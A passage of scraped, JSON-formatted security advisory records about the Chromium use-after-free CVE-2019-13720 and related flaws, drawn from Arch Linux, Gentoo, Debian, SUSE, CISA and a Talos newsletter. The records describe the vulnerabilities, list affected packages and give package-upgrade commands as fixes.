https://security.archlinux.org/AVG-1061\n\nSummary\n=======\n\nThe package electron before version 7.0.1-1 is vulnerable to arbitrary\ncode execution.\n\nResolution\n==========\n\nUpgrade to 7.0.1-1.\n\n# pacman -Syu \"electron>=7.0.1-1\"\n\nThe problem has been fixed upstream in version 7.0.1.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA use-after-free vulnerability has been found in the audio component of\nthe chromium browser before 78.0.3904.87. Google is aware of reports\nthat an exploit for this vulnerability exists in the wild.\n\nImpact\n======\n\nA remote attacker can execute arbitrary code on the affected host.\n\nReferences\n==========\n\nhttps://github.com/electron/electron/commit/25b3ee29cf9a8e3f59dcbabf7345b5b1360cd056\nhttps://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html\nhttps://crbug.com/1019226\nhttps://security.archlinux.org/CVE-2019-13720", "modified": "2019-11-04T00:00:00", "published": "2019-11-04T00:00:00", "id": "ASA-201911-7", "href": "https://security.archlinux.org/ASA-201911-7", "type": "archlinux", "title": "[ASA-201911-7] electron: arbitrary code execution", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-22T18:36:39", "bulletinFamily": "unix", "cvelist": ["CVE-2019-13720"], "description": "Arch Linux Security Advisory ASA-201911-2\n=========================================\n\nSeverity: Critical\nDate : 2019-11-02\nCVE-ID : CVE-2019-13720\nPackage : qt5-webengine\nType : arbitrary code execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1059\n\nSummary\n=======\n\nThe package qt5-webengine before version 5.13.2-2 is vulnerable to\narbitrary code execution.\n\nResolution\n==========\n\nUpgrade to 5.13.2-2.\n\n# pacman -Syu \"qt5-webengine>=5.13.2-2\"\n\nThe problem has been fixed upstream but no release is available yet.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA use-after-free vulnerability has been 
found in the audio component of\nthe chromium browser before 78.0.3904.87. Google is aware of reports\nthat an exploit for this vulnerability exists in the wild.\n\nImpact\n======\n\nA remote attacker can execute arbitrary code on the affected host.\n\nReferences\n==========\n\nhttps://bugs.archlinux.org/task/64347\nhttps://code.qt.io/cgit/qt/qtwebengine-chromium.git/patch/?id=d6e5fc10e417efdf8665d9fba57c269f0534072f\nhttps://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html\nhttps://crbug.com/1019226\nhttps://security.archlinux.org/CVE-2019-13720", "modified": "2019-11-02T00:00:00", "published": "2019-11-02T00:00:00", "id": "ASA-201911-2", "href": "https://security.archlinux.org/ASA-201911-2", "type": "archlinux", "title": "[ASA-201911-2] qt5-webengine: arbitrary code execution", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-22T18:36:39", "bulletinFamily": "unix", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "description": "Arch Linux Security Advisory ASA-201911-1\n=========================================\n\nSeverity: Critical\nDate : 2019-11-01\nCVE-ID : CVE-2019-13720 CVE-2019-13721\nPackage : chromium\nType : arbitrary code execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1058\n\nSummary\n=======\n\nThe package chromium before version 78.0.3904.87-1 is vulnerable to\narbitrary code execution.\n\nResolution\n==========\n\nUpgrade to 78.0.3904.87-1.\n\n# pacman -Syu \"chromium>=78.0.3904.87-1\"\n\nThe problems have been fixed upstream in version 78.0.3904.87.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2019-13720 (arbitrary code execution)\n\nA use-after-free vulnerability has been found in the audio component of\nthe chromium browser before 78.0.3904.87. 
Google is aware of reports\nthat an exploit for this vulnerability exists in the wild.\n\n- CVE-2019-13721 (arbitrary code execution)\n\nA use-after-free vulnerability has been found in the PDFium component\nof the chromium browser before 78.0.3904.87.\n\nImpact\n======\n\nA remote attacker can execute arbitrary code on the affected host.\n\nReferences\n==========\n\nhttps://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html\nhttps://crbug.com/1019226\nhttps://crbug.com/1013868\nhttps://security.archlinux.org/CVE-2019-13720\nhttps://security.archlinux.org/CVE-2019-13721", "modified": "2019-11-01T00:00:00", "published": "2019-11-01T00:00:00", "id": "ASA-201911-1", "href": "https://security.archlinux.org/ASA-201911-1", "type": "archlinux", "title": "[ASA-201911-1] chromium: arbitrary code execution", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2021-02-24T18:06:57", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720"], "description": "Google has released Chrome version 78.0.3904.87 for Windows, Mac, and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system. 
One of these vulnerabilities (CVE-2019-13720) was detected in exploits in the wild.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the [Chrome Release](<https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html>) and apply the necessary updates.\n", "modified": "2019-10-31T00:00:00", "published": "2019-10-31T00:00:00", "id": "CISA:809811C28F231C547A37018C8189C268", "href": "https://us-cert.cisa.gov/ncas/current-activity/2019/10/31/google-releases-security-updates-chrome", "type": "cisa", "title": "Google Releases Security Updates for Chrome", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2019-11-14T15:37:55", "bulletinFamily": "blog", "cvelist": ["CVE-2019-13720"], "description": "_Newsletter compiled by Jon Munshaw._ \n \nWelcome to this week\u2019s Threat Source newsletter \u2014 the perfect place to get caught up on all things Talos from the past week. \n \nThe only news we\u2019re going to cover this week is the biggest news we\u2019ve had in a while. Tuesday, we announced that Cisco Incident Response was becoming part of the Talos family. We\u2019ve been working together for years, but now we\u2019ll be closer than ever, so Incident Response can benefit from Talos\u2019 intelligence, while their boots-on-the-ground experience will only add to Talos\u2019 portfolio. 
\n \nCheck out our [announcement blog post](<https://blog.talosintelligence.com/2019/11/talos-cisco-incident-response-team-up.html>) for more information. The Talos Incident Response [at-a-glance](<https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/084/678/original/IR-AAG-3.pdf?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIXACIED2SPMSC7GA%2F20191107%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20191107T153609Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Signature=dafed95cccffbd6448473bcbb91f3516731d2ad25499ebcaf24147d014cceb32>) also provides an overview of the services IR provides. And the new [IR page](<https://talosintelligence.com/incident_response>) on TalosIntelligence.com gives you an easy way to contact IR, should you need their services. \n \nWe also have a [special edition of the Beers with Talos podcast](<https://blog.talosintelligence.com/2019/11/beers-with-talos-ep-65-please-welcome.html>), where Amy Henderson of Talos\u2019 Threat Interdiction team joins us to talk about the benefits of this new relationship. \n \n\n\n### Upcoming public engagements with Talos\n\n**Event: **\u201cIt\u2019s Never DNS\u2026. It Was DNS: How Adversaries Are Abusing Network Blind Spots\u201d at [SecureWV/Hack3rCon X](<https://securewv.org/>) \n**Location: **Charleston Coliseum & Convention Center, Charleston, WV \n**Date: **Nov. 15 - 17 \n**Speakers: **Edmund Brumaghin and Earl Carter \n**Synopsis: **While DNS is one of the most commonly used network protocols in most corporate networks, many organizations don\u2019t give it the same level of scrutiny as other network protocols present in their environments. DNS has become increasingly attractive to both red teams and malicious attackers alike to easily subvert otherwise solid security architectures. 
This presentation will provide several technical breakdowns of real-world attacks that have been seen leveraging DNS for a variety of purposes such as DNSMessenger, DNSpionage, and more. \n \n**Event: **\u201cReading Telegram messages abusing the shadows\u201d at [BSides Lisbon](<https://bsideslisbon.org/schedule/>)** ** \n**Location: **Auditorio FMD-UL, Lisbon, Portugal \n**Date: **Nov. 28 - 29 \n**Speakers: **Vitor Ventura \n**Synopsis: **One of the cornerstones of privacy today is secure messaging applications like Telegram, which deploy end-to-end encryption to protect the communications. But several clone applications have been created and distributed with the intent of spying on their users. In this talk, Vitor will demonstrate how the Telegram registration process became abused, allowing message interception on non-rooted Android devices without replacing the official application. This is another example on how encryption is not a panacea, and that side-channel attacks like this are a real problem for otherwise secure applications. \n \n**Event: **\u201cSigned, Sealed, Compromised: The Past, Present, and Future of Supply Chain Attacks\u201d at [CactusCon](<https://www.cactuscon.com/2019-talks-and-workshops/signed-sealed-compromised-the-past-present-and-future-of-supply-chain-attacks>) \n**Location: **Charleston Coliseum & Convention Center, Charleston, WV \n**Date:** Dec. 6 - 7 \n**Speakers: **Edmund Brumaghin and Earl Carter \n**Synopsis: **This talk will discuss the common techniques we\u2019re seeing in supply chain attacks. Supply chain attacks are a broad topic, but one that has continued to evolve and mature over the last decade. Nick and Edmund will walk through what a supply chain attack constitutes, the history of how these attacks have evolved, and where we see this attack technique moving in the future. 
\n\n\n### Cyber Security Week in Review\n\n * The [first public exploitation of the BlueKeep vulnerability](<https://www.wired.com/story/bluekeep-hacking-cryptocurrency-mining/>) hit over the weekend. Security researchers noticed the attacks in honeypots installing cryptocurrency miners, far from the worst possible outcome from these kinds of attacks. \n * The U.S. and Taiwan [held cyber war exercises](<https://www.bbc.com/news/technology-50289974>) this week, touted as the first of their kind. Taiwanese officials say the two countries focused on attacks that could come from North Korean-linked adversaries and other nation-state actors. \n * The head of Russia\u2019s State Security Service recently said at a conference that Russia and the U.S. have [resumed cooperation on cyber security](<https://www.thedailybeast.com/putins-top-spy-russian-fsb-chief-alexander-bortnikov-were-teaming-up-with-dc-on-cybersecurity>). Russia is maintaining contact between its security experts and the CIA, FBI and DEA in the U.S., he said. \n * Google is teaming up with [three private cyber security firms](<https://www.zdnet.com/article/google-asks-three-mobile-security-firms-to-help-scan-play-store-apps/>) to scan the Google Play store for malicious apps. Malware authors have been able to create ways to bypass the traditional protections Google put in place to stop malicious apps before they are posted on the store. \n * Two former Twitter employees were [charged with spying on behalf of Saudi Arabia](<https://www.cnn.com/2019/11/06/tech/twitter-employees-saudi-arabia-spying/index.html>). American prosecutors say the two men used their privileged access to gather information on Saudi political dissidents. \n * Voting machines in one Indiana county reportedly [switched users\u2019 votes](<https://thehill.com/homenews/state-watch/469137-machines-reportedly-switching-votes-plagues-indiana-county-for-second>), one of a few reports of malfunctioning machines on election day in the U.S. 
Several voters reported that the touchscreen machines would not select the candidate they wanted to choose, errors that are backed up with video evidence. \n * Apple [released updates](<https://www.forbes.com/sites/zakdoffman/2019/10/31/apple-patches-serious-ios-13-and-catalina-security-issues-update-your-devices-now/#34d873a52c2a>) for its Catalina operating system and iOS to patch several critical remote code execution vulnerabilities. The U.S. Department of Homeland Security urged users to update their devices as soon as possible. \n * Malware authors are starting to [unleash a wave of politically themed malware](<https://blog.talosintelligence.com/2019/11/political-malware.html>). Talos recently discovered malware families using the likenesses of U.S. President Donald Trump and Russian leader Vladimir Putin in a series of ransomware, RATs and screenlockers. \n\n### Notable recent security issues\n\n**Title: **[Use-after-free bug in Chrome could allow complete system takeover](<https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/>) \n**Description: **Google is urging Chrome users to update their web browsers as soon as possible due to a critical use-after-free vulnerability. The company says it will be releasing updates this week to protect against exploitation of the bug. The vulnerability, identified as CVE-2019-13720, exists in Chrome\u2019s audio component, and could allow an attacker to execute arbitrary code or enable full remote code execution capabilities. \n**Snort SIDs: **52068, 52069 \n \n**Title: **[Two remote code execution vulnerabilities in Investintech Able2Extract](<https://blog.talosintelligence.com/2019/11/vuln-spotlight-RCE-investintech-able2extract-nov-2019.html>) \n**Description: **Cisco Talos recently discovered two remote code execution vulnerabilities in Investintech\u2019s Able2Extract Professional. 
This software is a cross-platform PDF tool for Windows, Mac and Linux that converts PDFs and allows users to create and edit them. Other features include PDF signing, redactions and annotations. An attacker could exploit these vulnerabilities to execute arbitrary code on the victim machine. \n**Snort SIDs: **50864 - 50869 \n\n\n### Most prevalent malware files this week\n\n
", "modified": "2019-11-14T07:12:30", "published": "2019-11-14T07:12:30", "id": "TALOSBLOG:1789DE47001AAA9B14B2D2EC65C18C6A", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/4n3ghJUQWvA/threat-source-newsletter-oct-31-2019.html", "type": "talosblog", "title": "Threat Source newsletter (Nov. 7, 2019)", "cvss": {"score": 0.0, "vector": "NONE"}}], "gentoo": [{"lastseen": "2020-04-02T00:44:36", "bulletinFamily": "unix", "cvelist": ["CVE-2019-13720"], "description": "### Background\n\nLibrary for rendering dynamic web content in Qt5 C++ and QML applications. \n\n### Description\n\nA use-after-free vulnerability has been found in the audio component of Qt WebEngine. \n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted media file in an application linked against Qt WebEngine, possibly resulting in execution of arbitrary code with the privileges of the process or a Denial of Service condition. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Qt WebEngine users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-qt/qtwebengine-5.14.1\"", "edition": 1, "modified": "2020-04-01T00:00:00", "published": "2020-04-01T00:00:00", "id": "GLSA-202004-04", "href": "https://security.gentoo.org/glsa/202004-04", "title": "Qt WebEngine: Arbitrary code execution", "type": "gentoo", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2021-04-06T22:28:11", "bulletinFamily": "unix", "cvelist": ["CVE-2021-21168", "CVE-2021-21173", "CVE-2021-21185", "CVE-2021-21192", "CVE-2021-21165", "CVE-2021-21179", "CVE-2021-21196", "CVE-2021-21195", "CVE-2021-21171", "CVE-2021-21161", "CVE-2021-21178", "CVE-2021-21176", "CVE-2021-21159", "CVE-2021-21187", "CVE-2021-21180", "CVE-2021-21170", "CVE-2021-21162", "CVE-2021-21181", "CVE-2021-21167", "CVE-2021-21199", "CVE-2021-21172", "CVE-2021-21191", "CVE-2021-21163", "CVE-2021-21186", "CVE-2021-21193", "CVE-2021-21166", "CVE-2021-21194", "CVE-2021-21175", "CVE-2021-21198", "CVE-2021-21190", "CVE-2021-21160", "CVE-2021-21184", "CVE-2021-21188", "CVE-2021-21174", "CVE-2021-21177", "CVE-2021-21189", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21169", "CVE-2021-21197"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4886-1 security@debian.org\nhttps://www.debian.org/security/ Michael Gilbert\nApril 06, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium\nCVE ID : CVE-2021-21159 CVE-2021-21160 CVE-2021-21161 CVE-2021-21162\n CVE-2021-21163 CVE-2021-21165 CVE-2021-21166 CVE-2021-21167\n CVE-2021-21168 CVE-2021-21169 CVE-2021-21170 CVE-2021-21171\n CVE-2021-21172 CVE-2021-21173 CVE-2021-21174 CVE-2021-21175\n CVE-2021-21176 CVE-2021-21177 CVE-2021-21178 
CVE-2021-21179\n CVE-2021-21180 CVE-2021-21181 CVE-2021-21182 CVE-2021-21183\n CVE-2021-21184 CVE-2021-21185 CVE-2021-21186 CVE-2021-21187\n CVE-2021-21188 CVE-2021-21189 CVE-2021-21190 CVE-2021-21191\n CVE-2021-21192 CVE-2021-21193 CVE-2021-21194 CVE-2021-21195\n CVE-2021-21196 CVE-2021-21197 CVE-2021-21198 CVE-2021-21199\n\nSeveral vulnerabilities have been discovered in the chromium web browser.\n\nCVE-2021-21159\n\n Khalil Zhani discovered a buffer overflow issue in the tab implementation.\n\nCVE-2021-21160\n\n Marcin Noga discovered a buffer overflow issue in WebAudio.\n\nCVE-2021-21161\n\n Khalil Zhani discovered a buffer overflow issue in the tab implementation.\n\nCVE-2021-21162\n\n A use-after-free issue was discovered in the WebRTC implementation.\n\nCVE-2021-21163\n\n Alison Huffman discovered a data validation issue.\n\nCVE-2021-21165\n\n Alison Huffman discovered an error in the audio implementation.\n\nCVE-2021-21166\n\n Alison Huffman discovered an error in the audio implementation.\n\nCVE-2021-21167\n\n Leecraso and Guang Gong discovered a use-after-free issue in the bookmarks\n implementation.\n\nCVE-2021-21168\n\n Luan Herrera discovered a policy enforcement error in the appcache.\n\nCVE-2021-21169\n\n Bohan Liu and Moon Liang discovered an out-of-bounds access issue in the\n v8 javascript library.\n\nCVE-2021-21170\n\n David Erceg discovered a user interface error.\n\nCVE-2021-21171\n\n Irvan Kurniawan discovered a user interface error.\n\nCVE-2021-21172\n\n Maciej Pulikowski discovered a policy enforcement error in the File\n System API.\n\nCVE-2021-21173\n\n Tom Van Goethem discovered a network based information leak.\n\nCVE-2021-21174\n\n Ashish Guatam Kambled discovered an implementation error in the Referrer\n policy.\n\nCVE-2021-21175\n\n Jun Kokatsu discovered an implementation error in the Site Isolation\n feature.\n\nCVE-2021-21176\n\n Luan Herrera discovered an implementation error in the full screen mode.\n\nCVE-2021-21177\n\n 
Abdulrahman Alqabandi discovered a policy enforcement error in the\n Autofill feature.\n\nCVE-2021-21178\n\n Japong discovered an error in the Compositor implementation.\n\nCVE-2021-21179\n\n A use-after-free issue was discovered in the networking implementation.\n\nCVE-2021-21180\n\n Abdulrahman Alqabandi discovered a use-after-free issue in the tab search\n feature.\n\nCVE-2021-21181\n\n Xu Lin, Panagiotis Ilias, and Jason Polakis discovered a side-channel\n information leak in the Autofill feature.\n\nCVE-2021-21182\n\n Luan Herrera discovered a policy enforcement error in the site navigation\n implementation.\n\nCVE-2021-21183\n\n Takashi Yoneuchi discovered an implementation error in the Performance API.\n\nCVE-2021-21184\n\n James Hartig discovered an implementation error in the Performance API.\n\nCVE-2021-21185\n\n David Erceg discovered a policy enforcement error in Extensions.\n\nCVE-2021-21186\n\n dhirajkumarnifty discovered a policy enforcement error in the QR scan\n implementation.\n\nCVE-2021-21187\n\n Kirtikumar Anandrao Ramchandani discovered a data validation error in\n URL formatting.\n\nCVE-2021-21188\n\n Woojin Oh discovered a use-after-free issue in Blink/Webkit.\n\nCVE-2021-21189\n\n Khalil Zhani discovered a policy enforcement error in the Payments\n implementation.\n\nCVE-2021-21190\n\n Zhou Aiting discovered use of uninitialized memory in the pdfium library.\n\nCVE-2021-21191\n\n raven discovered a use-after-free issue in the WebRTC implementation.\n\nCVE-2021-21192\n\n Abdulrahman Alqabandi discovered a buffer overflow issue in the tab\n implementation.\n\nCVE-2021-21193\n\n A use-after-free issue was discovered in Blink/Webkit.\n\nCVE-2021-21194\n\n Leecraso and Guang Gong discovered a use-after-free issue in the screen\n capture feature.\n\nCVE-2021-21195\n\n Liu and Liang discovered a use-after-free issue in the v8 javascript\n library.\n\nCVE-2021-21196\n\n Khalil Zhani discovered a buffer overflow issue in the tab 
implementation.\n\nCVE-2021-21197\n\n Abdulrahman Alqabandi discovered a buffer overflow issue in the tab\n implementation.\n\nCVE-2021-21198\n\n Mark Brand discovered an out-of-bounds read issue in the Inter-Process\n Communication implementation.\n\nCVE-2021-21199\n\n Weipeng Jiang discovered a use-after-free issue in the Aura window and\n event manager.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 89.0.4389.114-1~deb10u1.\n\nWe recommend that you upgrade your chromium packages.\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/chromium\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 1, "modified": "2021-04-06T13:39:19", "published": "2021-04-06T13:39:19", "id": "DEBIAN:DSA-4886-1:0EF07", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2021/msg00067.html", "title": "[SECURITY] [DSA 4886-1] chromium security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-11T01:27:58", "bulletinFamily": "unix", "cvelist": ["CVE-2019-13704", "CVE-2019-5871", "CVE-2019-13714", "CVE-2019-13659", "CVE-2019-13666", "CVE-2019-13687", "CVE-2019-13676", "CVE-2019-13677", "CVE-2019-5869", "CVE-2019-13686", "CVE-2019-5880", "CVE-2019-13680", "CVE-2019-13664", "CVE-2019-13699", "CVE-2019-13662", "CVE-2019-13720", "CVE-2019-5877", "CVE-2019-13719", "CVE-2019-13665", "CVE-2019-13691", "CVE-2019-13674", "CVE-2019-13706", "CVE-2019-5875", "CVE-2019-13678", "CVE-2019-13694", "CVE-2019-13718", "CVE-2019-13701", "CVE-2019-13679", "CVE-2019-13702", "CVE-2019-13673", "CVE-2019-13670", "CVE-2019-13713", "CVE-2019-13700", "CVE-2019-5876", "CVE-2019-13671", 
"CVE-2019-13682", "CVE-2019-13707", "CVE-2019-13669", "CVE-2019-13681", "CVE-2019-13685", "CVE-2019-13695", "CVE-2019-5870", "CVE-2019-13717", "CVE-2019-13660", "CVE-2019-5878", "CVE-2019-13709", "CVE-2019-13661", "CVE-2019-13721", "CVE-2019-5879", "CVE-2019-13696", "CVE-2019-13703", "CVE-2019-13693", "CVE-2019-13692", "CVE-2019-13668", "CVE-2019-13663", "CVE-2019-13715", "CVE-2019-13683", "CVE-2019-5872", "CVE-2019-13697", "CVE-2019-13708", "CVE-2019-13705", "CVE-2019-13675", "CVE-2019-13710", "CVE-2019-5874", "CVE-2019-13667", "CVE-2019-13688", "CVE-2019-13711", "CVE-2019-13716"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA-4562-1 security@debian.org\nhttps://www.debian.org/security/ Michael Gilbert\nNovember 10, 2019 https://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : chromium\nCVE ID : CVE-2019-5869 CVE-2019-5870 CVE-2019-5871 CVE-2019-5872\n CVE-2019-5874 CVE-2019-5875 CVE-2019-5876 CVE-2019-5877\n CVE-2019-5878 CVE-2019-5879 CVE-2019-5880 CVE-2019-13659\n CVE-2019-13660 CVE-2019-13661 CVE-2019-13662 CVE-2019-13663\n CVE-2019-13664 CVE-2019-13665 CVE-2019-13666 CVE-2019-13667\n CVE-2019-13668 CVE-2019-13669 CVE-2019-13670 CVE-2019-13671\n CVE-2019-13673 CVE-2019-13674 CVE-2019-13675 CVE-2019-13676\n CVE-2019-13677 CVE-2019-13678 CVE-2019-13679 CVE-2019-13680\n CVE-2019-13681 CVE-2019-13682 CVE-2019-13683 CVE-2019-13685\n CVE-2019-13686 CVE-2019-13687 CVE-2019-13688 CVE-2019-13691\n CVE-2019-13692 CVE-2019-13693 CVE-2019-13694 CVE-2019-13695\n CVE-2019-13696 CVE-2019-13697 CVE-2019-13699 CVE-2019-13700\n CVE-2019-13701 CVE-2019-13702 CVE-2019-13703 CVE-2019-13704\n CVE-2019-13705 CVE-2019-13706 CVE-2019-13707 CVE-2019-13708\n CVE-2019-13709 CVE-2019-13710 CVE-2019-13711 CVE-2019-13713\n CVE-2019-13714 CVE-2019-13715 CVE-2019-13716 CVE-2019-13717\n CVE-2019-13718 CVE-2019-13719 CVE-2019-13720 
CVE-2019-13721\n\nSeveral vulnerabilities have been discovered in the chromium web browser.\n\nCVE-2019-5869\n\n Zhe Jin discovered a use-after-free issue.\n\nCVE-2019-5870\n\n Guang Gong discovered a use-after-free issue.\n\nCVE-2019-5871\n\n A buffer overflow issue was discovered in the skia library.\n\nCVE-2019-5872\n\n Zhe Jin discovered a use-after-free issue.\n\nCVE-2019-5874\n\n James Lee discovered an issue with external Uniform Resource Identifiers.\n\nCVE-2019-5875\n\n Khalil Zhani discovered a URL spoofing issue.\n\nCVE-2019-5876\n\n Man Yue Mo discovered a use-after-free issue.\n\nCVE-2019-5877\n\n Guang Gong discovered an out-of-bounds read issue.\n\nCVE-2019-5878\n\n Guang Gong discovered a use-after-free issue in the v8 javascript\n library.\n\nCVE-2019-5879\n\n Jinseo Kim discovered that extensions could read files on the local\n system.\n\nCVE-2019-5880\n\n Jun Kokatsu discovered a way to bypass the SameSite cookie feature.\n\nCVE-2019-13659\n\n Lnyas Zhang discovered a URL spoofing issue.\n\nCVE-2019-13660\n\n Wenxu Wu discovered a user interface error in full screen mode.\n\nCVE-2019-13661\n\n Wenxu Wu discovered a user interface spoofing issue in full screen mode.\n\nCVE-2019-13662\n\n David Erceg discovered a way to bypass the Content Security Policy.\n\nCVE-2019-13663\n\n Lnyas Zhang discovered a way to spoof Internationalized Domain Names.\n\nCVE-2019-13664\n\n Thomas Shadwell discovered a way to bypass the SameSite cookie feature.\n\nCVE-2019-13665\n\n Jun Kokatsu discovered a way to bypass the multiple file download\n protection feature.\n\nCVE-2019-13666\n\n Tom Van Goethem discovered an information leak.\n\nCVE-2019-13667\n\n Khalil Zhani discovered a URL spoofing issue.\n\nCVE-2019-13668\n\n David Erceg discovered an information leak.\n\nCVE-2019-13669\n\n Khalil Zhani discovered an authentication spoofing issue.\n\nCVE-2019-13670\n\n Guang Gong discovered a memory corruption issue in the v8 javascript\n library.\n\nCVE-2019-13671\n\n 
xisigr discovered a user interface error.\n\nCVE-2019-13673\n\n David Erceg discovered an information leak.\n\nCVE-2019-13674\n\n Khalil Zhani discovered a way to spoof Internationalized Domain Names.\n\nCVE-2019-13675\n\n Jun Kokatsu discovered a way to disable extensions.\n\nCVE-2019-13676\n\n Wenxu Wu discovered an error in a certificate warning.\n\nCVE-2019-13677\n\n Jun Kokatsu discovered an error in the chrome web store.\n\nCVE-2019-13678\n\n Ronni Skansing discovered a spoofing issue in the download dialog window.\n\nCVE-2019-13679\n\n Conrad Irwin discovered that user activation was not required for\n printing.\n\nCVE-2019-13680\n\n Thijs Alkamade discovered an IP address spoofing issue.\n\nCVE-2019-13681\n\n David Erceg discovered a way to bypass download restrictions.\n\nCVE-2019-13682\n\n Jun Kokatsu discovered a way to bypass the site isolation feature.\n\nCVE-2019-13683\n\n David Erceg discovered an information leak.\n\nCVE-2019-13685\n\n Khalil Zhani discovered a use-after-free issue.\n\nCVE-2019-13686\n\n Brendon discovered a use-after-free issue.\n\nCVE-2019-13687\n\n Man Yue Mo discovered a use-after-free issue.\n\nCVE-2019-13688\n\n Man Yue Mo discovered a use-after-free issue.\n\nCVE-2019-13691\n\n David Erceg discovered a user interface spoofing issue.\n\nCVE-2019-13692\n\n Jun Kokatsu discovered a way to bypass the Same Origin Policy.\n\nCVE-2019-13693\n\n Guang Gong discovered a use-after-free issue.\n\nCVE-2019-13694\n\n banananapenguin discovered a use-after-free issue.\n\nCVE-2019-13695\n\n Man Yue Mo discovered a use-after-free issue.\n\nCVE-2019-13696\n\n Guang Gong discovered a use-after-free issue in the v8 javascript library.\n\nCVE-2019-13697\n\n Luan Herrera discovered an information leak.\n\nCVE-2019-13699\n\n Man Yue Mo discovered a use-after-free issue.\n\nCVE-2019-13700\n\n Man Yue Mo discovered a buffer overflow issue.\n\nCVE-2019-13701\n\n David Erceg discovered a URL spoofing issue.\n\nCVE-2019-13702\n\n Phillip Langlois and 
Edward Torkington discovered a privilege escalation\n issue in the installer.\n\nCVE-2019-13703\n\n Khalil Zhani discovered a URL spoofing issue.\n\nCVE-2019-13704\n\n Jun Kokatsu discovered a way to bypass the Content Security Policy.\n\nCVE-2019-13705\n\n Luan Herrera discovered a way to bypass extension permissions.\n\nCVE-2019-13706\n\n pdknsk discovered an out-of-bounds read issue in the pdfium library.\n\nCVE-2019-13707\n\n Andrea Palazzo discovered an information leak.\n\nCVE-2019-13708\n\n Khalil Zhani discovered an authentication spoofing issue.\n\nCVE-2019-13709\n\n Zhong Zhaochen discovered a way to bypass download restrictions.\n\nCVE-2019-13710\n\n bernardo.mrod discovered a way to bypass download restrictions.\n\nCVE-2019-13711\n\n David Erceg discovered an information leak.\n\nCVE-2019-13713\n\n David Erceg discovered an information leak.\n\nCVE-2019-13714\n\n Jun Kokatsu discovered an issue with Cascading Style Sheets.\n\nCVE-2019-13715\n\n xisigr discovered a URL spoofing issue.\n\nCVE-2019-13716\n\n Barron Hagerman discovered an error in the service worker implementation.\n\nCVE-2019-13717\n\n xisigr discovered a user interface spoofing issue.\n\nCVE-2019-13718\n\n Khalil Zhani discovered a way to spoof Internationalized Domain Names.\n\nCVE-2019-13719\n\n Khalil Zhani discovered a user interface spoofing issue.\n\nCVE-2019-13720\n\n Anton Ivanov and Alexey Kulaev discovered a use-after-free issue.\n\nCVE-2019-13721\n\n banananapenguin discovered a use-after-free issue in the pdfium library.\n\nFor the oldstable distribution (stretch), support for chromium has been\ndiscontinued. 
Please upgrade to the stable release (buster) to continue\nreceiving chromium updates or switch to firefox, which continues to be\nsupported in the oldstable release.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 78.0.3904.97-1~deb10u1.\n\nWe recommend that you upgrade your chromium packages.\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/chromium\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2019-11-10T19:17:01", "published": "2019-11-10T19:17:01", "id": "DEBIAN:DSA-4562-1:58850", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2019/msg00214.html", "title": "[SECURITY] [DSA 4562-1] chromium security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2019-11-03T04:05:38", "bulletinFamily": "unix", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "description": "This update for chromium fixes the following issues:\n\n Chromium was updated to 78.0.3904.87 boo#1155643:\n\n * CVE-2019-13721: Use-after-free in PDFium\n * CVE-2019-13720: Use-after-free in audio\n\n", "edition": 1, "modified": "2019-11-03T00:14:07", "published": "2019-11-03T00:14:07", "id": 